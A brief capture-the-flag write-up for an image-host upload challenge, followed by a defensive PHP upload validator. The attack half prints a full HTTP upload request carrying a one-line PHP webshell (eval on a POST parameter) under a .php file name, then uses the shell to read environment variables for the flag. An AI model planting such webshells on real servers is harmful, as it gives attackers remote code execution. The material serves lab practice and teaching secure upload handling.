
垫刀之路03: This Is an Image Host

Network Security


Upload an image, capture the request, insert a one-line webshell into the data, and change the file name to php:

POST /upload.php HTTP/1.1
Host: 127.0.0.1:3437
Content-Length: 552
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: zh-CN
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBmBJ9J5hljeGxGdZ
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:3437
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:3437/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryBmBJ9J5hljeGxGdZ
Content-Disposition: form-data; name="image"; filename="test.php"
Content-Type: image/png

<?php @eval($_POST['attack']);?>
------WebKitFormBoundaryBmBJ9J5hljeGxGdZ--

Connect, right-click the URL entry, open the virtual terminal, and enter env.

Find the flag.
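
A server-side check that rejects the request above, as an added example (this is not the challenge's upload.php, whose source the page does not show): it ignores the client-supplied Content-Type, allowlists the extension, verifies the leading bytes, and generates the stored name itself. The function name safe_image_name and the sample inputs are hypothetical and constructed for illustration.

```php
<?php
declare(strict_types=1);

// Allowed image types: stored extension => leading magic bytes.
const ALLOWED_SIGNATURES = [
    'png' => "\x89PNG\r\n\x1a\n",
    'jpg' => "\xFF\xD8\xFF",
    'gif' => "GIF8",
];

/**
 * Decide how to store an uploaded image. Returns a server-generated file
 * name, or null when the upload must be rejected. The part's Content-Type
 * header is deliberately not a parameter: the client controls it.
 */
function safe_image_name(string $clientName, string $bytes): ?string
{
    // 1. Extension allowlist, using only the final extension of the name.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if (!array_key_exists($ext, ALLOWED_SIGNATURES)) {
        return null;
    }
    // 2. Content must start with the signature matching that extension.
    $sig = ALLOWED_SIGNATURES[$ext];
    if (strncmp($bytes, $sig, strlen($sig)) !== 0) {
        return null;
    }
    // 3. Never reuse the client's file name on disk; generate one.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed samples: a script body under two names, and a PNG header.
$samples = [
    ['test.php', "<?php /* script body, as in the request above */ ?>"],
    ['test.png', "<?php /* same body, image extension */ ?>"],
    ['cat.png',  "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"],
];
foreach ($samples as [$name, $bytes]) {
    $stored = safe_image_name($name, $bytes);
    echo $name, ' => ', $stored ?? 'rejected', PHP_EOL;
}
```

A signature check alone can be satisfied by a file that begins with valid image bytes and carries script text later, so the extension allowlist and the generated name are what keep the stored file from being executed. Storing uploads outside the web root, or in a directory where the server does not run PHP, closes the remaining gap.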